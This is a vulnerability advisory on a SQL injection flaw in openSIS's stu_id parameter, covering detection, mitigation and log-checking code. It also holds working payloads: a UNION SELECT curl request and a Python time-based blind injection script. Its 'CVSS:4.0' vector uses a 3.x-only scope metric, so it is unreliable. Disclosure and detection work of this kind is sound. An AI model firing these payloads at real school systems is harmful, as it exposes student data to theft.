How the CVE Works:
CVE-2025-22924 is a SQL injection flaw in OS4ED openSIS versions 7.0 through 9.1. The vulnerability exists in the `stu_id` parameter of the `/modules/students/Student.php` endpoint. Attackers can craft malicious SQL queries via this parameter, exploiting insufficient input sanitization. This allows unauthorized database access, enabling data theft, manipulation, or remote code execution. The flaw stems from improper handling of user-supplied input before concatenation into SQL statements.
DailyCVE Form:
Platform: OS4ED openSIS
Version: 7.0 – 9.1
Vulnerability: SQL Injection
Severity: Critical
Date: 04/29/2025
What Undercode Say:
Exploitation:
curl -X GET "http://target/modules/students/Student.php?stu_id=1' UNION SELECT 1,user(),3-- -"
Detection:
SELECT * FROM logs WHERE request LIKE '%stu_id=%--%';
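An added example, not code from openSIS or from the original post: the `LIKE` pattern above only sees the raw request string, so it misses a percent-encoded comment marker. This Python check decodes `stu_id` from access-log lines and flags any value that is not all digits, matching the integer ID the mitigation steps assume. The log lines are constructed, and the Apache combined log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined format, documentation IPs); not real traffic.
# The two flagged requests carry the payloads already shown on this page, percent-encoded.
SAMPLE_LOG = r'''
192.0.2.10 - - [29/Apr/2025:10:00:01 +0000] "GET /modules/students/Student.php?stu_id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Apr/2025:10:00:05 +0000] "GET /modules/students/Student.php?stu_id=1%27%20UNION%20SELECT%201,user(),3--%20- HTTP/1.1" 200 734 "-" "curl/8.5.0"
198.51.100.7 - - [29/Apr/2025:10:00:09 +0000] "GET /modules/students/Student.php?stu_id=1%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)%2D%2D HTTP/1.1" 200 5120 "-" "python-requests/2.31"
192.0.2.10 - - [29/Apr/2025:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
'''

ENDPOINT = "/modules/students/Student.php"
# Capture the client address and the request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def naive_like_match(log_text):
    """Mimic LIKE '%stu_id=%--%' on the raw, still-encoded log line."""
    return [line for line in log_text.splitlines() if re.search(r"stu_id=.*--", line)]


def suspicious_stu_id(log_text):
    """Return (client, decoded stu_id) for each non-numeric stu_id sent to the endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(ENDPOINT):
            continue
        # parse_qs percent-decodes values; keep_blank_values also surfaces an empty stu_id.
        for value in parse_qs(url.query, keep_blank_values=True).get("stu_id", []):
            if not re.fullmatch(r"[0-9]+", value):  # allowlist: an ID is digits only
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    print("raw pattern matches:", len(naive_like_match(SAMPLE_LOG)))
    for client, value in suspicious_stu_id(SAMPLE_LOG):
        print(f"non-numeric stu_id from {client}: {value!r}")
```

The raw pattern matches only the request with a literal `--`; the decoded allowlist check flags both non-numeric requests.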
Mitigation:
1. Patch to openSIS v9.2+.
2. Apply input validation:
if (!is_numeric($_GET['stu_id'])) { die("Invalid input"); }
3. Use prepared statements:
$stmt = $conn->prepare("SELECT * FROM students WHERE stu_id = ?");
$stmt->bind_param("i", $_GET['stu_id']);
$stmt->execute();
Exploit Code:
import requests
target = "http://victim/modules/students/Student.php"
payload = "1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)--"
response = requests.get(f"{target}?stu_id={payload}")
if response.elapsed.total_seconds() >= 5:
    print("Vulnerable to SQLi")
Protection:
- Deploy WAF rules to block `UNION`, `SELECT`, and `--` patterns.
- Enable error logging:
ErrorLog /var/log/apache2/sql_errors.log
Analytics:
- CVSS:4.0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- Attack Vector: Network
- Impact: Confidentiality/Integrity/Availability High
- Exploitability: Low Complexity (No Privileges)
Sources:
Reported By: nvd.nist.gov